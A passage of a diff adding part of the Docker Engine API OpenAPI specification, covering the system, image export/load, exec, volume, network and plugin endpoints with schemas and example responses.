IPv4Forwarding: true + Images: 16 + IndexServerAddress: "https://index.docker.io/v1/" + InitPath: "/usr/bin/docker" + InitSha1: "" + KernelMemory: true + KernelVersion: "3.12.0-1-amd64" + Labels: + - "storage=ssd" + MemTotal: 2099236864 + MemoryLimit: true + NCPU: 1 + NEventsListener: 0 + NFd: 11 + NGoroutines: 21 + Name: "prod-server-42" + NoProxy: "9.81.1.160" + OomKillDisable: true + OSType: "linux" + OperatingSystem: "Boot2Docker" + Plugins: + Volume: + - "local" + Network: + - "null" + - "host" + - "bridge" + RegistryConfig: + IndexConfigs: + docker.io: + Name: "docker.io" + Official: true + Secure: true + InsecureRegistryCIDRs: + - "127.0.0.0/8" + SecurityOptions: + - Key: "Name" + Value: "seccomp" + - Key: "Profile" + Value: "default" + - Key: "Name" + Value: "apparmor" + - Key: "Name" + Value: "selinux" + - Key: "Name" + Value: "userns" + ServerVersion: "1.9.0" + SwapLimit: false + SystemStatus: + - + - "State" + - "Healthy" + SystemTime: "2015-03-10T11:11:23.730591467-07:00" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["System"] + /version: + get: + summary: "Get version" + description: "Returns the version of Docker that is running and various information about the system that Docker is running on." + operationId: "SystemVersion" + produces: + - "application/json" + responses: + 200: + description: "no error" + schema: + type: "object" + properties: + Version: + type: "string" + ApiVersion: + type: "string" + MinAPIVersion: + type: "string" + GitCommit: + type: "string" + GoVersion: + type: "string" + Os: + type: "string" + Arch: + type: "string" + KernelVersion: + type: "string" + Experimental: + type: "boolean" + BuildTime: + type: "string" + examples: + application/json: + Version: "1.13.0" + Os: "linux" + KernelVersion: "3.19.0-23-generic" + GoVersion: "go1.6.3" + GitCommit: "deadbee" + Arch: "amd64" + ApiVersion: "1.25" + MinAPIVersion: "1.12" + BuildTime: "2016-06-14T07:09:13.444803460+00:00" + Experimental: true + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["System"] + /_ping: + get: + summary: "Ping" + description: "This is a dummy endpoint you can use to test if the server is accessible." + operationId: "SystemPing" + produces: + - "text/plain" + responses: + 200: + description: "no error" + schema: + type: "string" + example: "OK" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["System"] + /commit: + post: + summary: "Create a new image from a container" + operationId: "ImageCommit" + consumes: + - "application/json" + produces: + - "application/json" + responses: + 201: + description: "no error" + schema: + $ref: "#/definitions/IdResponse" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "containerConfig" + in: "body" + description: "The container configuration" + schema: + $ref: "#/definitions/Config" + - name: "container" + in: "query" + description: "The ID or name of the container to commit" + type: "string" + - name: "repo" + in: "query" + description: "Repository name for the created image" + type: "string" + - name: "tag" + in: "query" + description: "Tag name for the create image" + type: "string" + - name: "comment" + in: "query" + description: "Commit message" + type: "string" + - name: "author" + in: "query" + description: "Author of the image (e.g., `John Hannibal Smith `)" + type: "string" + - name: "pause" + in: "query" + description: "Whether to pause the container before committing" + type: "boolean" + default: true + - name: "changes" + in: "query" + description: "`Dockerfile` instructions to apply while committing" + type: "string" + tags: ["Image"] + /events: + get: + summary: "Monitor events" + description: | + Stream real-time events from the server. + + Various objects within Docker report events when something happens to them. + + Containers report these events: `attach, commit, copy, create, destroy, detach, die, exec_create, exec_detach, exec_start, export, kill, oom, pause, rename, resize, restart, start, stop, top, unpause, update` + + Images report these events: `delete, import, load, pull, push, save, tag, untag` + + Volumes report these events: `create, mount, unmount, destroy` + + Networks report these events: `create, connect, disconnect, destroy` + + The Docker daemon reports these events: `reload` + + operationId: "SystemEvents" + produces: + - "application/json" + responses: + 200: + description: "no error" + schema: + type: "object" + properties: + Type: + description: "The type of object emitting the event" + type: "string" + Action: + description: "The type of event" + type: "string" + Actor: + type: "object" + properties: + ID: + description: "The ID of the object emitting the event" + type: "string" + Attributes: + description: "Various key/value attributes of the object, depending on its type" + type: "object" + additionalProperties: + type: "string" + time: + description: "Timestamp of event" + type: "integer" + timeNano: + description: "Timestamp of event, with nanosecond accuracy" + type: "integer" + format: "int64" + examples: + application/json: + Type: "container" + Action: "create" + Actor: + ID: "ede54ee1afda366ab42f824e8a5ffd195155d853ceaec74a927f249ea270c743" + Attributes: + com.example.some-label: "some-label-value" + image: "alpine" + name: "my-container" + time: 1461943101 + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "since" + in: "query" + description: "Show events created since this timestamp then stream new events." + type: "string" + - name: "until" + in: "query" + description: "Show events created until this timestamp then stop streaming." + type: "string" + - name: "filters" + in: "query" + description: | + A JSON encoded value of filters (a `map[string][]string`) to process on the event list. Available filters: + + - `container=` container name or ID + - `event=` event type + - `image=` image name or ID + - `label=` image or container label + - `type=` object to filter by, one of `container`, `image`, `volume`, `network`, or `daemon` + - `volume=` volume name or ID + - `network=` network name or ID + - `daemon=` daemon name or ID + type: "string" + tags: ["System"] + /system/df: + get: + summary: "Get data usage information" + operationId: "SystemDataUsage" + responses: + 200: + description: "no error" + schema: + type: "object" + properties: + LayersSize: + type: "integer" + format: "int64" + Images: + type: "array" + items: + $ref: "#/definitions/ImageSummary" + Containers: + type: "array" + items: + $ref: "#/definitions/ContainerSummary" + Volumes: + type: "array" + items: + $ref: "#/definitions/Volume" + example: + LayersSize: 1092588 + Images: + - + Id: "sha256:2b8fd9751c4c0f5dd266fcae00707e67a2545ef34f9a29354585f93dac906749" + ParentId: "" + RepoTags: + - "busybox:latest" + RepoDigests: + - "busybox@sha256:a59906e33509d14c036c8678d687bd4eec81ed7c4b8ce907b888c607f6a1e0e6" + Created: 1466724217 + Size: 1092588 + SharedSize: 0 + VirtualSize: 1092588 + Labels: {} + Containers: 1 + Containers: + - + Id: "e575172ed11dc01bfce087fb27bee502db149e1a0fad7c296ad300bbff178148" + Names: + - "/top" + Image: "busybox" + ImageID: "sha256:2b8fd9751c4c0f5dd266fcae00707e67a2545ef34f9a29354585f93dac906749" + Command: "top" + Created: 1472592424 + Ports: [] + SizeRootFs: 1092588 + Labels: {} + State: "exited" + Status: "Exited (0) 56 minutes ago" + HostConfig: + NetworkMode: "default" + NetworkSettings: + Networks: + bridge: + IPAMConfig: null + Links: null + Aliases: null + NetworkID: "d687bc59335f0e5c9ee8193e5612e8aee000c8c62ea170cfb99c098f95899d92" + EndpointID: "8ed5115aeaad9abb174f68dcf135b49f11daf597678315231a32ca28441dec6a" + Gateway: "172.18.0.1" + IPAddress: "172.18.0.2" + IPPrefixLen: 16 + IPv6Gateway: "" + GlobalIPv6Address: "" + GlobalIPv6PrefixLen: 0 + MacAddress: "02:42:ac:12:00:02" + Mounts: [] + Volumes: + - + Name: "my-volume" + Driver: "local" + Mountpoint: "" + Labels: null + Scope: "" + Options: null + UsageData: + Size: 0 + RefCount: 0 + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["System"] + /images/{name}/get: + get: + summary: "Export an image" + description: | + Get a tarball containing all images and metadata for a repository. + + If `name` is a specific name and tag (e.g. `ubuntu:latest`), then only that image (and its parents) are returned. If `name` is an image ID, similarly only that image (and its parents) are returned, but with the exclusion of the `repositories` file in the tarball, as there were no image names referenced. + + ### Image tarball format + + An image tarball contains one directory per image layer (named using its long ID), each containing these files: + + - `VERSION`: currently `1.0` - the file format version + - `json`: detailed layer information, similar to `docker inspect layer_id` + - `layer.tar`: A tarfile containing the filesystem changes in this layer + + The `layer.tar` file contains `aufs` style `.wh..wh.aufs` files and directories for storing attribute changes and deletions. + + If the tarball defines a repository, the tarball should also include a `repositories` file at the root that contains a list of repository and tag names mapped to layer IDs. + + ```json + { + "hello-world": { + "latest": "565a9d68a73f6706862bfe8409a7f659776d4d60a8d096eb4a3cbce6999cc2a1" + } + } + ``` + operationId: "ImageGet" + produces: + - "application/x-tar" + responses: + 200: + description: "no error" + schema: + type: "string" + format: "binary" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "name" + in: "path" + description: "Image name or ID" + type: "string" + required: true + tags: ["Image"] + /images/get: + get: + summary: "Export several images" + description: | + Get a tarball containing all images and metadata for several image repositories. + + For each value of the `names` parameter: if it is a specific name and tag (e.g. `ubuntu:latest`), then only that image (and its parents) are returned; if it is an image ID, similarly only that image (and its parents) are returned and there would be no names referenced in the 'repositories' file for this image ID. + + For details on the format, see [the export image endpoint](#operation/ImageGet). + operationId: "ImageGetAll" + produces: + - "application/x-tar" + responses: + 200: + description: "no error" + schema: + type: "string" + format: "binary" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "names" + in: "query" + description: "Image names to filter by" + type: "array" + items: + type: "string" + tags: ["Image"] + /images/load: + post: + summary: "Import images" + description: | + Load a set of images and tags into a repository. + + For details on the format, see [the export image endpoint](#operation/ImageGet). + operationId: "ImageLoad" + consumes: + - "application/x-tar" + produces: + - "application/json" + responses: + 200: + description: "no error" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "imagesTarball" + in: "body" + description: "Tar archive containing images" + schema: + type: "string" + format: "binary" + - name: "quiet" + in: "query" + description: "Suppress progress details during load." + type: "boolean" + default: false + tags: ["Image"] + /containers/{id}/exec: + post: + summary: "Create an exec instance" + description: "Run a command inside a running container." + operationId: "ContainerExec" + consumes: + - "application/json" + produces: + - "application/json" + responses: + 201: + description: "no error" + schema: + $ref: "#/definitions/IdResponse" + 404: + description: "no such container" + schema: + $ref: "#/definitions/ErrorResponse" + examples: + application/json: + message: "No such container: c2ada9df5af8" + 409: + description: "container is paused" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "execConfig" + in: "body" + description: "Exec configuration" + schema: + type: "object" + properties: + AttachStdin: + type: "boolean" + description: "Attach to `stdin` of the exec command." + AttachStdout: + type: "boolean" + description: "Attach to `stdout` of the exec command." + AttachStderr: + type: "boolean" + description: "Attach to `stderr` of the exec command." + DetachKeys: + type: "string" + description: "Override the key sequence for detaching a container. Format is a single character `[a-Z]` or `ctrl-` where `` is one of: `a-z`, `@`, `^`, `[`, `,` or `_`." + Tty: + type: "boolean" + description: "Allocate a pseudo-TTY." + Env: + description: "A list of environment variables in the form `[\"VAR=value\", ...]`." + type: "array" + items: + type: "string" + Cmd: + type: "array" + description: "Command to run, as a string or array of strings." + items: + type: "string" + Privileged: + type: "boolean" + description: "Runs the exec process with extended privileges." + default: false + User: + type: "string" + description: "The user, and optionally, group to run the exec process inside the container. Format is one of: `user`, `user:group`, `uid`, or `uid:gid`." + example: + AttachStdin: false + AttachStdout: true + AttachStderr: true + DetachKeys: "ctrl-p,ctrl-q" + Tty: false + Cmd: + - "date" + Env: + - "FOO=bar" + - "BAZ=quux" + required: true + - name: "id" + in: "path" + description: "ID or name of container" + type: "string" + required: true + tags: ["Exec"] + /exec/{id}/start: + post: + summary: "Start an exec instance" + description: "Starts a previously set up exec instance. If detach is true, this endpoint returns immediately after starting the command. Otherwise, it sets up an interactive session with the command." + operationId: "ExecStart" + consumes: + - "application/json" + produces: + - "application/vnd.docker.raw-stream" + responses: + 200: + description: "No error" + 404: + description: "No such exec instance" + schema: + $ref: "#/definitions/ErrorResponse" + 409: + description: "Container is stopped or paused" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "execStartConfig" + in: "body" + schema: + type: "object" + properties: + Detach: + type: "boolean" + description: "Detach from the command." + Tty: + type: "boolean" + description: "Allocate a pseudo-TTY." + example: + Detach: false + Tty: false + - name: "id" + in: "path" + description: "Exec instance ID" + required: true + type: "string" + tags: ["Exec"] + /exec/{id}/resize: + post: + summary: "Resize an exec instance" + description: "Resize the TTY session used by an exec instance. This endpoint only works if `tty` was specified as part of creating and starting the exec instance." + operationId: "ExecResize" + responses: + 201: + description: "No error" + 404: + description: "No such exec instance" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + description: "Exec instance ID" + required: true + type: "string" + - name: "h" + in: "query" + description: "Height of the TTY session in characters" + type: "integer" + - name: "w" + in: "query" + description: "Width of the TTY session in characters" + type: "integer" + tags: ["Exec"] + /exec/{id}/json: + get: + summary: "Inspect an exec instance" + description: "Return low-level information about an exec instance." + operationId: "ExecInspect" + produces: + - "application/json" + responses: + 200: + description: "No error" + schema: + type: "object" + properties: + ID: + type: "string" + Running: + type: "boolean" + ExitCode: + type: "integer" + ProcessConfig: + $ref: "#/definitions/ProcessConfig" + OpenStdin: + type: "boolean" + OpenStderr: + type: "boolean" + OpenStdout: + type: "boolean" + ContainerID: + type: "string" + Pid: + type: "integer" + description: "The system process ID for the exec process." + examples: + application/json: + CanRemove: false + ContainerID: "b53ee82b53a40c7dca428523e34f741f3abc51d9f297a14ff874bf761b995126" + DetachKeys: "" + ExitCode: 2 + ID: "f33bbfb39f5b142420f4759b2348913bd4a8d1a6d7fd56499cb41a1bb91d7b3b" + OpenStderr: true + OpenStdin: true + OpenStdout: true + ProcessConfig: + arguments: + - "-c" + - "exit 2" + entrypoint: "sh" + privileged: false + tty: true + user: "1000" + Running: false + Pid: 42000 + 404: + description: "No such exec instance" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + description: "Exec instance ID" + required: true + type: "string" + tags: ["Exec"] + + /volumes: + get: + summary: "List volumes" + operationId: "VolumeList" + produces: ["application/json"] + responses: + 200: + description: "Summary volume data that matches the query" + schema: + type: "object" + required: [Volumes, Warnings] + properties: + Volumes: + type: "array" + x-nullable: false + description: "List of volumes" + items: + $ref: "#/definitions/Volume" + Warnings: + type: "array" + x-nullable: false + description: "Warnings that occurred when fetching the list of volumes" + items: + type: "string" + + examples: + application/json: + Volumes: + - Name: "tardis" + Driver: "local" + Mountpoint: "/var/lib/docker/volumes/tardis" + Labels: + com.example.some-label: "some-value" + com.example.some-other-label: "some-other-value" + Scope: "local" + Options: + device: "tmpfs" + o: "size=100m,uid=1000" + type: "tmpfs" + Warnings: [] + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "filters" + in: "query" + description: | + JSON encoded value of the filters (a `map[string][]string`) to + process on the volumes list. Available filters: + + - `name=` Matches all or part of a volume name. + - `dangling=` When set to `true` (or `1`), returns all + volumes that are not in use by a container. When set to `false` + (or `0`), only volumes that are in use by one or more + containers are returned. + - `driver=` Matches all or part of a volume + driver name. + type: "string" + format: "json" + tags: ["Volume"] + + /volumes/create: + post: + summary: "Create a volume" + operationId: "VolumeCreate" + consumes: ["application/json"] + produces: ["application/json"] + responses: + 201: + description: "The volume was created successfully" + schema: + $ref: "#/definitions/Volume" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "volumeConfig" + in: "body" + required: true + description: "Volume configuration" + schema: + type: "object" + properties: + Name: + description: "The new volume's name. If not specified, Docker generates a name." + type: "string" + x-nullable: false + Driver: + description: "Name of the volume driver to use." + type: "string" + default: "local" + x-nullable: false + DriverOpts: + description: "A mapping of driver options and values. These options are passed directly to the driver and are driver specific." + type: "object" + additionalProperties: + type: "string" + Labels: + description: "User-defined key/value metadata." + type: "object" + additionalProperties: + type: "string" + example: + Name: "tardis" + Labels: + com.example.some-label: "some-value" + com.example.some-other-label: "some-other-value" + Driver: "custom" + tags: ["Volume"] + + /volumes/{name}: + get: + summary: "Inspect a volume" + operationId: "VolumeInspect" + produces: ["application/json"] + responses: + 200: + description: "No error" + schema: + $ref: "#/definitions/Volume" + 404: + description: "No such volume" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "name" + in: "path" + required: true + description: "Volume name or ID" + type: "string" + tags: ["Volume"] + + delete: + summary: "Remove a volume" + description: "Instruct the driver to remove the volume." + operationId: "VolumeDelete" + responses: + 204: + description: "The volume was removed" + 404: + description: "No such volume or volume driver" + schema: + $ref: "#/definitions/ErrorResponse" + 409: + description: "Volume is in use and cannot be removed" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "name" + in: "path" + required: true + description: "Volume name or ID" + type: "string" + - name: "force" + in: "query" + description: "Force the removal of the volume" + type: "boolean" + default: false + tags: ["Volume"] + /volumes/prune: + post: + summary: "Delete unused volumes" + produces: + - "application/json" + operationId: "VolumePrune" + parameters: + - name: "filters" + in: "query" + description: | + Filters to process on the prune list, encoded as JSON (a `map[string][]string`). + + Available filters: + type: "string" + responses: + 200: + description: "No error" + schema: + type: "object" + properties: + VolumesDeleted: + description: "Volumes that were deleted" + type: "array" + items: + type: "string" + SpaceReclaimed: + description: "Disk space reclaimed in bytes" + type: "integer" + format: "int64" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["Volume"] + /networks: + get: + summary: "List networks" + operationId: "NetworkList" + produces: + - "application/json" + responses: + 200: + description: "No error" + schema: + type: "array" + items: + $ref: "#/definitions/Network" + examples: + application/json: + - Name: "bridge" + Id: "f2de39df4171b0dc801e8002d1d999b77256983dfc63041c0f34030aa3977566" + Created: "2016-10-19T06:21:00.416543526Z" + Scope: "local" + Driver: "bridge" + EnableIPv6: false + Internal: false + IPAM: + Driver: "default" + Config: + - + Subnet: "172.17.0.0/16" + Containers: + 39b69226f9d79f5634485fb236a23b2fe4e96a0a94128390a7fbbcc167065867: + EndpointID: "ed2419a97c1d9954d05b46e462e7002ea552f216e9b136b80a7db8d98b442eda" + MacAddress: "02:42:ac:11:00:02" + IPv4Address: "172.17.0.2/16" + IPv6Address: "" + Options: + com.docker.network.bridge.default_bridge: "true" + com.docker.network.bridge.enable_icc: "true" + com.docker.network.bridge.enable_ip_masquerade: "true" + com.docker.network.bridge.host_binding_ipv4: "0.0.0.0" + com.docker.network.bridge.name: "docker0" + com.docker.network.driver.mtu: "1500" + - Name: "none" + Id: "e086a3893b05ab69242d3c44e49483a3bbbd3a26b46baa8f61ab797c1088d794" + Created: "0001-01-01T00:00:00Z" + Scope: "local" + Driver: "null" + EnableIPv6: false + Internal: false + IPAM: + Driver: "default" + Config: [] + Containers: {} + Options: {} + - Name: "host" + Id: "13e871235c677f196c4e1ecebb9dc733b9b2d2ab589e30c539efeda84a24215e" + Created: "0001-01-01T00:00:00Z" + Scope: "local" + Driver: "host" + EnableIPv6: false + Internal: false + IPAM: + Driver: "default" + Config: [] + Containers: {} + Options: {} + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "filters" + in: "query" + description: | + JSON encoded value of the filters (a `map[string][]string`) to process on the networks list. Available filters: + + - `driver=` Matches a network's driver. + - `id=` Matches all or part of a network ID. + - `label=` or `label==` of a network label. + - `name=` Matches all or part of a network name. + - `type=["custom"|"builtin"]` Filters networks by type. The `custom` keyword returns all user-defined networks. + type: "string" + tags: ["Network"] + + /networks/{id}: + get: + summary: "Inspect a network" + operationId: "NetworkInspect" + produces: + - "application/json" + responses: + 200: + description: "No error" + schema: + $ref: "#/definitions/Network" + 404: + description: "Network not found" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + description: "Network ID or name" + required: true + type: "string" + tags: ["Network"] + + delete: + summary: "Remove a network" + operationId: "NetworkDelete" + responses: + 204: + description: "No error" + 404: + description: "no such network" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + description: "Network ID or name" + required: true + type: "string" + tags: ["Network"] + + /networks/create: + post: + summary: "Create a network" + operationId: "NetworkCreate" + consumes: + - "application/json" + produces: + - "application/json" + responses: + 201: + description: "No error" + schema: + type: "object" + properties: + Id: + description: "The ID of the created network." + type: "string" + Warning: + type: "string" + example: + Id: "22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30" + Warning: "" + 403: + description: "operation not supported for pre-defined networks" + schema: + $ref: "#/definitions/ErrorResponse" + 404: + description: "plugin not found" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "networkConfig" + in: "body" + description: "Network configuration" + required: true + schema: + type: "object" + required: ["Name"] + properties: + Name: + description: "The network's name." + type: "string" + CheckDuplicate: + description: "Check for networks with duplicate names." + type: "boolean" + Driver: + description: "Name of the network driver plugin to use." + type: "string" + default: "bridge" + Internal: + description: "Restrict external access to the network." + type: "boolean" + IPAM: + description: "Optional custom IP scheme for the network." + $ref: "#/definitions/IPAM" + EnableIPv6: + description: "Enable IPv6 on the network." + type: "boolean" + Options: + description: "Network specific options to be used by the drivers." + type: "object" + additionalProperties: + type: "string" + Labels: + description: "User-defined key/value metadata." + type: "object" + additionalProperties: + type: "string" + example: + Name: "isolated_nw" + CheckDuplicate: false + Driver: "bridge" + EnableIPv6: true + IPAM: + Driver: "default" + Config: + - Subnet: "172.20.0.0/16" + IPRange: "172.20.10.0/24" + Gateway: "172.20.10.11" + - Subnet: "2001:db8:abcd::/64" + Gateway: "2001:db8:abcd::1011" + Options: + foo: "bar" + Internal: true + Options: + com.docker.network.bridge.default_bridge: "true" + com.docker.network.bridge.enable_icc: "true" + com.docker.network.bridge.enable_ip_masquerade: "true" + com.docker.network.bridge.host_binding_ipv4: "0.0.0.0" + com.docker.network.bridge.name: "docker0" + com.docker.network.driver.mtu: "1500" + Labels: + com.example.some-label: "some-value" + com.example.some-other-label: "some-other-value" + tags: ["Network"] + + /networks/{id}/connect: + post: + summary: "Connect a container to a network" + operationId: "NetworkConnect" + consumes: + - "application/octet-stream" + responses: + 200: + description: "No error" + 403: + description: "Operation not supported for swarm scoped networks" + schema: + $ref: "#/definitions/ErrorResponse" + 404: + description: "Network or container not found" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + description: "Network ID or name" + required: true + type: "string" + - name: "container" + in: "body" + required: true + schema: + type: "object" + properties: + Container: + type: "string" + description: "The ID or name of the container to connect to the network." + EndpointConfig: + $ref: "#/definitions/EndpointSettings" + example: + Container: "3613f73ba0e4" + EndpointConfig: + IPAMConfig: + IPv4Address: "172.24.56.89" + IPv6Address: "2001:db8::5689" + tags: ["Network"] + + /networks/{id}/disconnect: + post: + summary: "Disconnect a container from a network" + operationId: "NetworkDisconnect" + consumes: + - "application/json" + responses: + 200: + description: "No error" + 403: + description: "Operation not supported for swarm scoped networks" + schema: + $ref: "#/definitions/ErrorResponse" + 404: + description: "Network or container not found" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "id" + in: "path" + description: "Network ID or name" + required: true + type: "string" + - name: "container" + in: "body" + required: true + schema: + type: "object" + properties: + Container: + type: "string" + description: "The ID or name of the container to disconnect from the network." + Force: + type: "boolean" + description: "Force the container to disconnect from the network." + tags: ["Network"] + /networks/prune: + post: + summary: "Delete unused networks" + consumes: + - "application/json" + produces: + - "application/json" + operationId: "NetworkPrune" + parameters: + - name: "filters" + in: "query" + description: | + Filters to process on the prune list, encoded as JSON (a `map[string][]string`). + + Available filters: + type: "string" + responses: + 200: + description: "No error" + schema: + type: "object" + properties: + NetworksDeleted: + description: "Networks that were deleted" + type: "array" + items: + type: "string" + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["Network"] + /plugins: + get: + summary: "List plugins" + operationId: "PluginList" + description: "Returns information about installed plugins." + produces: ["application/json"] + responses: + 200: + description: "No error" + schema: + type: "array" + items: + $ref: "#/definitions/Plugin" + example: + - Id: "5724e2c8652da337ab2eedd19fc6fc0ec908e4bd907c7421bf6a8dfc70c4c078" + Name: "tiborvass/sample-volume-plugin" + Tag: "latest" + Active: true + Settings: + Env: + - "DEBUG=0" + Args: null + Devices: null + Config: + Description: "A sample volume plugin for Docker" + Documentation: "https://docs.docker.com/engine/extend/plugins/" + Interface: + Types: + - "docker.volumedriver/1.0" + Socket: "plugins.sock" + Entrypoint: + - "/usr/bin/sample-volume-plugin" + - "/data" + WorkDir: "" + User: {} + Network: + Type: "" + Linux: + Capabilities: null + AllowAllDevices: false + Devices: null + Mounts: null + PropagatedMount: "/data" + Env: + - Name: "DEBUG" + Description: "If set, prints debug messages" + Settable: null + Value: "0" + Args: + Name: "args" + Description: "command line arguments" + Settable: null + Value: [] + 500: + description: "Server error" + schema: + $ref: "#/definitions/ErrorResponse" + tags: ["Plugin"] + + /plugins/privileges: + get: + summary: "Get plugin privileges" + operationId: "GetPluginPrivileges" + responses: + 200: + description: "no error" + schema: + type: "array" + items: + description: "Describes a permission the user has to accept upon installing the plugin." + type: "object" + properties: + Name: + type: "string" + Description: + type: "string" + Value: + type: "array" + items: + type: "string" + example: + - Name: "network" + Description: "" + Value: + - "host" + - Name: "mount" + Description: "" + Value: + - "/data" + - Name: "device" + Description: "" + Value: + - "/dev/cpu_dma_latency" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "name" + in: "query" + description: "The name of the plugin. The `:latest` tag is optional, and is the default if omitted." + required: true + type: "string" + tags: + - "Plugin" + + /plugins/pull: + post: + summary: "Install a plugin" + operationId: "PluginPull" + description: | + Pulls and installs a plugin. After the plugin is installed, it can be enabled using the [`POST /plugins/{name}/enable` endpoint](#operation/PostPluginsEnable). + produces: + - "application/json" + responses: + 204: + description: "no error" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "remote" + in: "query" + description: | + Remote reference for plugin to install. + + The `:latest` tag is optional, and is used as the default if omitted. + required: true + type: "string" + - name: "name" + in: "query" + description: | + Local name for the pulled plugin. + + The `:latest` tag is optional, and is used as the default if omitted. + required: false + type: "string" + - name: "X-Registry-Auth" + in: "header" + description: "A base64-encoded auth configuration to use when pulling a plugin from a registry. [See the authentication section for details.](#section/Authentication)" + type: "string" + - name: "body" + in: "body" + schema: + type: "array" + items: + description: "Describes a permission accepted by the user upon installing the plugin." + type: "object" + properties: + Name: + type: "string" + Description: + type: "string" + Value: + type: "array" + items: + type: "string" + example: + - Name: "network" + Description: "" + Value: + - "host" + - Name: "mount" + Description: "" + Value: + - "/data" + - Name: "device" + Description: "" + Value: + - "/dev/cpu_dma_latency" + tags: ["Plugin"] + /plugins/{name}/json: + get: + summary: "Inspect a plugin" + operationId: "PluginInspect" + responses: + 200: + description: "no error" + schema: + $ref: "#/definitions/Plugin" + 404: + description: "plugin is not installed" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "name" + in: "path" + description: "The name of the plugin. The `:latest` tag is optional, and is the default if omitted." + required: true + type: "string" + tags: ["Plugin"] + /plugins/{name}: + delete: + summary: "Remove a plugin" + operationId: "PluginDelete" + responses: + 200: + description: "no error" + schema: + $ref: "#/definitions/Plugin" + 404: + description: "plugin is not installed" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "name" + in: "path" + description: "The name of the plugin. The `:latest` tag is optional, and is the default if omitted." + required: true + type: "string" + - name: "force" + in: "query" + description: "Disable the plugin before removing. This may result in issues if the plugin is in use by a container." + type: "boolean" + default: false + tags: ["Plugin"] + /plugins/{name}/enable: + post: + summary: "Enable a plugin" + operationId: "PluginEnable" + responses: + 200: + description: "no error" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "name" + in: "path" + description: "The name of the plugin. The `:latest` tag is optional, and is the default if omitted." + required: true + type: "string" + - name: "timeout" + in: "query" + description: "Set the HTTP client timeout (in seconds)" + type: "integer" + default: 0 + tags: ["Plugin"] + /plugins/{name}/disable: + post: + summary: "Disable a plugin" + operationId: "PluginDisable" + responses: + 200: + description: "no error" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "name" + in: "path" + description: "The name of the plugin. The `:latest` tag is optional, and is the default if omitted." + required: true + type: "string" + tags: ["Plugin"] + /plugins/{name}/upgrade: + post: + summary: "Upgrade a plugin" + operationId: "PluginUpgrade" + responses: + 204: + description: "no error" + 404: + description: "plugin not installed" + schema: + $ref: "#/definitions/ErrorResponse" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "name" + in: "path" + description: "The name of the plugin. The `:latest` tag is optional, and is the default if omitted." + required: true + type: "string" + - name: "remote" + in: "query" + description: | + Remote reference to upgrade to. + + The `:latest` tag is optional, and is used as the default if omitted. + required: true + type: "string" + - name: "X-Registry-Auth" + in: "header" + description: "A base64-encoded auth configuration to use when pulling a plugin from a registry. [See the authentication section for details.](#section/Authentication)" + type: "string" + - name: "body" + in: "body" + schema: + type: "array" + items: + description: "Describes a permission accepted by the user upon installing the plugin." + type: "object" + properties: + Name: + type: "string" + Description: + type: "string" + Value: + type: "array" + items: + type: "string" + example: + - Name: "network" + Description: "" + Value: + - "host" + - Name: "mount" + Description: "" + Value: + - "/data" + - Name: "device" + Description: "" + Value: + - "/dev/cpu_dma_latency" + tags: ["Plugin"] + /plugins/create: + post: + summary: "Create a plugin" + operationId: "PluginCreate" + consumes: + - "application/x-tar" + responses: + 204: + description: "no error" + 500: + description: "server error" + schema: + $ref: "#/definitions/ErrorResponse" + parameters: + - name: "name" + in: "query" + description: "The name of the plugin. The `:latest` tag is optional, and is the default if omitted." + required: true + type: 